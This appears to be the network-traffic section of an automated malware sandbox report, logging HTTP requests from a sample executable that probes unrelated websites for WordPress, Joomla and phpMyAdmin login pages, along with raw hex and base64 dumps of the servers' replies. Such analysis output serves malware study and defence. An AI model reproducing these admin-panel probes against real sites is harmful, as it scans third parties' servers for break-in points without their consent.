                                                                                                                                                                                                    Server: UD Forwarding 3.1
                                                                                                                                                                                                    Data Raw: 32 33 32 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 69 65 72 20 65 6e 74 73 74 65 68 74 20 76 69 69 64 65 6c 74 61 2e 63 6f 6d 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 48 4f 52 54 43 55 54 20 49 43 4f 4e 22 20 68 72 65 66 3d 22 2f 67 66 78 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 74 69 74 6c 65 3e 76 69 69 64 65 6c 74 61 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 62 6f 64 79 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 62 66 62 66 62 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 77 41 41 41 50 2b 43 41 4d 41 41 41 41 49 47 51 35 61 41 41 41 44 41 46 42 4d 56 45 58 36 2b 76 72 36 2b 76 6e 35 2b 76 72 35 2b 76 6e 36 2b 66 72 36 2b 66 6e 35 2b 66 6e 34 2b 50 6a 34 2b 50 66 33 2b 50 6a 33 2b 50 66 34 39 2f 6a 33 39 2f 66 33 39 2f 62 32 39 76 62 32 39 76 58 31 39 76 62 31 39 76 58 32 39 66 62 31 39 66 58 31 39 66 54 30 39 50 54 30 39 50 50 7a 39 50 54 7a 39 50 50 30 38 2f 54 30 38 2f 50 7a 38 2f 50 79 38 76 4c 79 38 76 48 78 38 76 48 79 38 66 4c 78 38 66 48 78 38 50 48 77 38 50 44 77 38 4f 2f 76 38 50 44 76 38 4f 2f 77 37 2f 44 77 37 2b 2f 76 37 2b 2f 75 37 75 37 75 37 75 33 74 37 75 33 75 37 65 37 75 37 65 33 74 37 65 33 73 37 4f 7a 73 37 4f 76 72 37 4f 7a 72 37 4f 76 73 36 2b 7a 72 36 2b 76 72 36 2b 72 71 36 75 72 71 36 75 6e 70 36 75 72 70 36 75 6e 71 36 65 6e 70 36 65 6e 70 36 4f 6e 6f 36 4f 6a 6f 36 4f 66 6e 36 4f 6a 6e 36 4f 66 6f 35 2b 6a 6f 35 2b 66 6e 35 2b 66 6d 35 75 62 6d 35 75 58 6c 35 75 62 6c 35 75 58 6d 35 65 62 6d 35 65 58 6c 35 65 58 6b 35 4f 54 6b 35 4f 50 6a 35 4f 54 6a 35 4f 50 6b 34 2b 54 6a 34 2b 50 6a 34 2b 4c 69 34 75 4c 69 34 75 48 68 34 75 4c 68 34 75 48 69 34 65 4c 69 34 65 48 68 34 65 48 67 34 4f 44 67 34 4e 2f 66 34 4f 44 67 33 2b 44 66 33 39 2f 66 33 39 37 65 33 74 37 65 33 74 33 64 33 74 37 65 33 64 37 64 33 64 33 64 33 64 7a 63 33 4e 7a 63 33 4e 76 62 33 4e 7a 62 33 4e 76 63 32 39 7a 62 32 39 76 62 32 39 72 61 32 74 72 61 32 74 6e 5a 32 74 72 61 32 64 72 61 32 64 6e 59 32 74 6e 5a 32 64 6e 59 32 4e 6a 59 32 4e 66 58 32 4e 6a 58 32 4e 66 59 31 39 6a 58 31 39 66 58 31 39 62 57 31 74 62 57 31 74 58 56 31 74 62 56 31 74 58 57 31 64 62 57 31 64 58 56 31 64 58 55 31 4e 54 55 31 4e 50 54 31 4e 54 54 31 4e 50 55 30 39 54 55 30 39 50 54 30 39 50 53 30 74 4c 53 30 74 48 52 30 74 4c 52 30 74 48 53 30 64 4c 53 30 64 48 52 30 64 48 51 30 4e 44 51 30 4d 2f 50 30 4e 44 50 30 4d 2f 51 7a 39 44 50 7a 38 2f 50 7a 38 37 4e 7a 63 33 4d 7a 4d 33 4d
                                                                                                                                                                                                    Data Ascii: 23223<!DOCTYPE html><html lang="de"><head><meta name="description" content="Hier entsteht viidelta.com"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="SHORTCUT ICON" href="/gfx/favicon.ico"><title>viidelta.com</title><style>*{margin:0;padding:0}html,body{height:100%;background-color:#fbfbfb}body{font-family:Arial,Verdana,sans-serif;text-align:center;margin:0 auto;background:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAwAAAP+CAMAAAAIGQ5aAAADAFBMVEX6+vr6+vn5+vr5+vn6+fr6+fn5+fn4+Pj4+Pf3+Pj3+Pf49/j39/f39/b29vb29vX19vb19vX29fb19fX19fT09PT09PPz9PTz9PP08/T08/Pz8/Py8vLy8vHx8vHy8fLx8fHx8PHw8PDw8O/v8PDv8O/w7/Dw7+/v7+/u7u7u7u3t7u3u7e7u7e3t7e3s7Ozs7Ovr7Ozr7Ovs6+zr6+vr6+rq6urq6unp6urp6unq6enp6enp6Ono6Ojo6Ofn6Ojn6Ofo5+jo5+fn5+fm5ubm5uXl5ubl5uXm5ebm5eXl5eXk5OTk5OPj5OTj5OPk4+Tj4+Pj4+Li4uLi4uHh4uLh4uHi4eLi4eHh4eHg4ODg4N/f4ODg3+Df39/f397e3t7e3t3d3t7e3d7d3d3d3dzc3Nzc3Nvb3Nzb3Nvc29zb29vb29ra2tra2tnZ2tra2dra2dnY2tnZ2dnY2NjY2NfX2NjX2NfY19jX19fX19bW1tbW1tXV1tbV1tXW1dbW1dXV1dXU1NTU1NPT1NTT1NPU09TU09PT09PS0tLS0tHR0tLR0tHS0dLS0dHR0dHQ0NDQ0M/P0NDP0M/Qz9DPz8/Pz87Nzc3MzM3M
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.422385931 CET1340INData Raw: 7a 4d 7a 4d 79 38 7a 4c 79 38 76 4b 79 38 72 4a 79 63 6e 49 79 4d 6a 48 79 4d 6e 48 79 4d 66 49 78 38 6a 48 78 38 66 48 78 38 62 46 78 63 58 45 78 4d 58 45 78 4d 54 44 78 4d 50 45 77 38 54 45 77 38 50 44 77 38 50 42 77 63 48 41 77 4d 48 41 77 4d
                                                                                                                                                                                                    Data Ascii: zMzMy8zLy8vKy8rJycnIyMjHyMnHyMfIx8jHx8fHx8bFxcXExMXExMTDxMPEw8TEw8PDw8PBwcHAwMHAwMC/wL/Av8DAv7+/v7++vr6+vr29vr69vr2+vb69vb29vby8vLy8vLu7vLy8u7y7u7u7u7q7urq5ubm4uLi3uLi3uLe4t7i4t7e3t7e2tra2trW1tra1trW2tba1tbW1tbS0tLS0tLOztLSztLO0s7S0s7Ozs7OysrK
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.422399044 CET1340INData Raw: 2b 34 6d 37 43 46 42 77 68 76 6a 43 4b 47 41 75 36 6b 2f 4e 6c 6c 50 45 37 63 43 39 79 70 69 2b 6b 34 4f 72 39 35 66 30 56 67 30 7a 33 72 68 32 4e 79 59 45 50 61 4f 4f 67 77 63 68 69 47 58 39 51 6b 70 6b 47 6c 43 6f 65 77 6a 46 77 54 67 31 57 53
                                                                                                                                                                                                    Data Ascii: +4m7CFBwhvjCKGAu6k/NllPE7cC9ypi+k4Or95f0Vg0z3rh2NyYEPaOOgwchiGX9QkpkGlCoewjFwTg1WSWd5kdC2o2BDZUEBb7rQJI4SGZy1wN9G0ApoYWu9znB6ys5mXgnaZHUTBrsjt6ApvMr21VUrznKBuKiefMsyOrw6WYJ3YkW+MWwFVc3DtgHChXYWiKcJOtFd2Rxfs6LXDh8ebIkTjbjeQLdnI9BR6yEazqfpmm3gX2
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.422434092 CET1340INData Raw: 66 52 47 39 48 62 45 4b 61 39 58 6c 35 5a 30 58 47 77 70 69 34 78 65 54 4e 36 63 44 76 6f 58 4d 70 47 70 6d 73 7a 34 74 50 71 62 50 6a 59 6a 74 30 63 72 64 5a 74 31 69 77 53 33 5a 70 75 63 6d 77 49 48 6b 49 4e 74 6f 73 63 6c 75 30 6c 4c 58 75 55
                                                                                                                                                                                                    Data Ascii: fRG9HbEKa9Xl5Z0XGwpi4xeTN6cDvoXMpGpmsz4tPqbPjYjt0crdZt1iwS3ZpucmwIHkINtosclu0lLXuU9I7NdYnnfmTxPXq40H2NK0mnvWHCL+kCFOtyrWjGdJNOEFO5SVlriQ2SdQD/yIaVPPSf4bb/5DMJE6EJG5m6t/TZTv65mqg8SGi2UQFXWR1LYvlLmvMOaKJ1GITEyLNP2i4oCmqp/jnBjKtjztg0aWcwb/o990mKD
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.422442913 CET1340INData Raw: 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 71 41 41 41 41 4b 33 43 41 4d 41 41 41 42 74 4d 51 33 55 41 41 41 42 67 46 42 4d 56 45 55 41 41 41 44 52 30 64 48 2f 2f 2f 2b 78 73 62 48 2f 2f 2f 2b 71 71 71 72 35 2b 66 6d 71 71 71 71 6f 71
                                                                                                                                                                                                    Data Ascii: KGgoAAAANSUhEUgAAAqAAAAK3CAMAAABtMQ3UAAABgFBMVEUAAADR0dH///+xsbH///+qqqr5+fmqqqqoqKj6+vqrq6v4+PipqamoqKj5+fmoqKjQ0NCnp6enp6f6+vqmpqbX19enp6enp6dlY2H7+/unp6empqbc3NzFxcX8/Pynp6empqazs7ODg4L6+vrBwcGmpqbR0dHc3NyqeF9fXl6mpqb7+/tcOx6mpqbS0tLe3t6+vb
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.422454119 CET1340INData Raw: 4e 46 41 45 7a 6f 68 31 46 55 55 4e 44 48 51 56 47 6f 51 68 55 74 46 59 30 48 6f 41 7a 6a 78 69 6c 48 6f 35 4d 77 30 4e 4b 4f 4a 47 35 34 6a 6e 67 52 34 49 70 35 4b 52 66 73 59 54 6c 68 4e 58 30 34 4b 56 62 71 42 55 30 76 79 53 4f 76 67 47 67 66
                                                                                                                                                                                                    Data Ascii: NFAEzoh1FUUNDHQVGoQhUtFY0HoAzjxilHo5Mw0NKOJG54jngR4Ip5KRfsYTlhNX04KVbqBU0vySOvgGgfGtURrOh+RHXA7Q0oVMFqgSR8Lp2G5yEsHrM5HOcuIoqJJRJOAjkBAIYTW1Is8HpgamSPGQYkHTYOTXwkXUL5KtB9EoTMZeCbz0u54BpveeCIvCVKKu1nNCw5l8MgpvOqaI0phB1TElFp/9fJ5cjadb80NPBWmoJFD
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.422466040 CET1340INData Raw: 55 77 6c 61 33 6f 63 71 45 45 4b 30 34 66 66 42 5a 53 6f 36 6e 45 74 62 53 71 59 4e 76 78 65 55 54 4f 6d 6c 2f 66 50 4a 35 68 6b 65 79 32 2b 33 4c 55 30 6d 76 61 33 75 71 6c 34 6f 64 6d 33 44 46 6b 70 78 30 47 61 59 6c 77 44 4d 34 36 78 6e 31 2b
                                                                                                                                                                                                    Data Ascii: Uwla3ocqEEK04ffBZSo6nEtbSqYNvxeUTOml/fPJ5hkey2+3LU0mva3uql4odm3DFkpx0GaYlwDM46xn1+6roqDNKiedkuBV4WtJ6LsrbgEGoz0Ojh0t0Mm0yOmlGTUHtxrxZ7OIVGIzaBgk6S/28K/AjzCgz4KmsqO+3Qyl+w2cFwl46M3sXZJJYOYVLNBUn6WSvpLnUX5WI2tNOWJrRdfMmH4pS5J8vjFLm09C+Q5Qqj3XPjs
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.422489882 CET1340INData Raw: 57 2b 47 4e 5a 66 38 2b 36 6e 75 6d 75 4c 6a 34 6c 73 31 62 53 4e 4a 64 58 2f 39 66 54 4f 55 6d 45 42 35 38 6c 5a 58 64 58 56 2f 64 70 57 46 54 68 51 30 61 37 57 39 32 36 72 43 71 55 75 49 34 6d 66 72 66 47 69 39 43 61 52 64 6d 4e 38 73 53 75 7a
                                                                                                                                                                                                    Data Ascii: W+GNZf8+6numuLj4ls1bSNJdX/9fTOUmEB58lZXdXV/dpWFThQ0a7W926rCqUuI4mfrfGi9CaRdmN8sSuzqAF749AacZD6tad0nJpCKb0c82zJP8OxSnUjnocNqZzCYYY2nceWWmfUvGJacIqcofR/ck8EvCSVeyioqq582rBfoqeWVUvuiQrQpspdVT1XQImW/Ue/e7z7S8D0IFSv8u5nuiEM4NTW/3saxqu2UWiQ6JpQm0hKG
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.422506094 CET1340INData Raw: 4f 78 6a 69 62 39 58 6a 67 35 6e 31 70 4b 51 71 6a 4e 63 36 65 6b 49 6d 68 71 73 4f 6e 69 65 57 5a 71 42 78 41 41 71 4d 51 4b 6f 69 57 56 61 4c 73 39 71 78 4b 37 43 58 5a 39 4d 65 57 35 56 6c 4a 59 67 45 4a 52 6c 65 49 36 76 78 7a 78 53 61 6d 61
                                                                                                                                                                                                    Data Ascii: Oxjib9Xjg5n1pKQqjNc6ekImhqsOnieWZqBxAAqMQKoiWVaLs9qxK7CXZ9MeW5VlJYgEJRleI6vxzxSamaPoD2gmbXVq+3/BG+KvWzTbXFtTZcPLJ2SfjfvjIA3RmcleM+ihZfaGTAR2tfHzcxMvXaftcbV/NRL0zDdW5aBsp6cFNmmrCvSuh2cX3G5D09JB6/kn8HpXJtFI9vQWe6GeX9uyynrrSLoYXBc/SgI4GcydnZ2dTQe
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.422600985 CET1340INData Raw: 48 2f 33 4d 5a 6d 71 4a 2f 58 4a 69 71 66 33 54 47 66 6c 33 2f 45 31 78 62 4a 37 58 34 78 4d 67 39 47 36 51 69 6b 34 78 53 41 69 41 65 4f 44 47 4a 6f 70 67 43 34 4e 54 44 47 4e 2f 47 6b 64 6f 76 31 4b 61 48 4c 77 50 71 36 64 50 41 74 31 72 49 30
                                                                                                                                                                                                    Data Ascii: H/3MZmqJ/XJiqf3TGfl3/E1xbJ7X4xMg9G6Qik4xSAiAeODGJopgC4NTDGN/Gkdov1KaHLwPq6dPAt1rI0onmYZ0WJHcl++XG32VDpLD58ldKN7jIG0m4HOi+lnWj6C0EZA2+ySxkcSHtWJ+WyLdaKcjySACSO4wU56QEVEV7zmS/x93GBTKe13LoejB04egRREmx1LRPM53dSJqA9uLINXGz27Nc9MaVLQ1rsnDZXyT/SzzC5x
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.604996920 CET1340INData Raw: 79 38 68 6f 63 30 62 4c 4a 43 53 43 4a 54 67 4b 4f 52 54 44 6b 64 37 67 4d 30 4e 42 48 41 39 51 2f 75 64 33 66 38 73 77 66 35 78 4d 77 68 34 4b 4f 77 65 65 78 33 69 43 7a 6a 4a 32 55 54 69 70 4a 57 30 71 46 30 58 70 39 76 71 39 76 67 6b 34 73 76
                                                                                                                                                                                                    Data Ascii: y8hoc0bLJCSCJTgKORTDkd7gM0NBHA9Q/ud3f8swf5xMwh4KOweex3iCzjJ2UTipJW0qF0Xp9vq9vgk4sv6MONpvSpvUBopqw975WUOdaEvTl8QzUf+rZNrAJnlDaJedxPUKndwo+27w8JkVJfrV4eoMp8PTxxBDjkykoHz71y8z9u/Dtf/t0ElrGUX4tkvkUVFe7mepqPCBdL3+qhOqbFNuEE3j6IHhq5Uj5Uk85zMHnoFj/di


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    108192.168.2.456544109.168.109.224806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.277893066 CET234OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: americanrecords.it
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.473361015 CET430INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Content-Length: 184
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 1d 16 0d c7 a6 07 f9 89 24 88 c4 94 83 47 4c ab 25 c1 b6 42 91 f8 f6 52 b8 78 9c 9d f9 66 96 ec d2 4b c2 6e 75 06 27 76 2e a1 6e 8e 65 91 80 1f 20 16 19 cb 11 53 96 6e ce 21 8c 10 b3 ca a7 1e 91 f6 d5 53 22 45 cb 17 61 3b db 0b 1a 47 31 54 da 42 ae 27 c5 09 6e 47 8f e0 1a 22 77 cd bf 8e db d3 bf cc a2 3c 62 28 93 02 06 f1 9e c4 68 05 87 e6 5a 02 ce 26 e8 f5 b3 53 a1 91 06 e6 76 04 b5 50 0f 47 81 56 60 65 37 c2 28 86 8f 18 42 82 c6 ad ac fd 4b a3 fb cb fb 01 96 3d a0 d1 d2 00 00 00
                                                                                                                                                                                                    Data Ascii: M0<$GL%BRxfKnu'v.ne Sn!S"Ea;G1TB'nG"w<b(hZ&SvPGV`e7(BK=
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.481287956 CET280OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: americanrecords.it
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://americanrecords.it/wp-login.php
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.678184986 CET427INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3b 0f 82 40 10 84 fb fb 15 2b 3d 2c 1a ca cb 15 f2 88 24 88 c4 1c 85 25 e6 d6 1c 09 1c 08 87 c4 7f 2f 8f c6 72 76 e6 9b 59 7e 88 6e a1 7c 14 31 5c e4 35 83 a2 3c 67 69 08 8e 8b 98 c6 32 41 8c 64 b4 3b 27 cf 47 8c 73 47 30 ae 6d db 08 ae a9 52 8b b0 b5 6d 48 04 7e 00 79 67 21 e9 26 a3 38 ee 47 c6 71 0b f1 67 a7 be 2b 77 14 7f 99 45 31 de 0b a9 09 06 7a 4f 34 5a 52 50 de 33 c0 b9 77 2b d5 d6 06 61 ae 46 30 0b f2 5a 11 e8 0c 58 5d 8f 30 d2 f0 a1 c1 e3 d8 af 13 5b f9 52 b7 3e c5 7e 8f 8c 6e 79 cf 00 00 00
                                                                                                                                                                                                    Data Ascii: M;@+=,$%/rvY~n|1\5<gi2Ad;'GsG0mRmH~yg!&8Gqg+wE1zO4ZRP3w+aF0ZX]0[R>~ny


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    109192.168.2.45654795.168.220.210806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.278158903 CET238OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.518446922 CET715INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                                                                    content-length: 0
                                                                                                                                                                                                    set-cookie: k8spersistent=22cb6f4364865b2e22019c7dac43ae73|11f187638643e13d7bd1963991fac52b; Expires=Tue, 28-Nov-23 05:59:32 GMT; Max-Age=172800; Path=/; HttpOnly
                                                                                                                                                                                                    set-cookie: OF=3dbfg2bnrmlhvmjhpi48421sg2; path=/; domain=.beachrecruitment.com; HttpOnly
                                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                    location: https://beachrecruitment.com/administrator/
                                                                                                                                                                                                    vary: User-Agent


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    110192.168.2.4566783.234.162.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.278230906 CET224OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: t1eng.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.371973991 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                    content-length: 1238
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.371985912 CET281INData Raw: 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61
                                                                                                                                                                                                    Data Ascii: www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
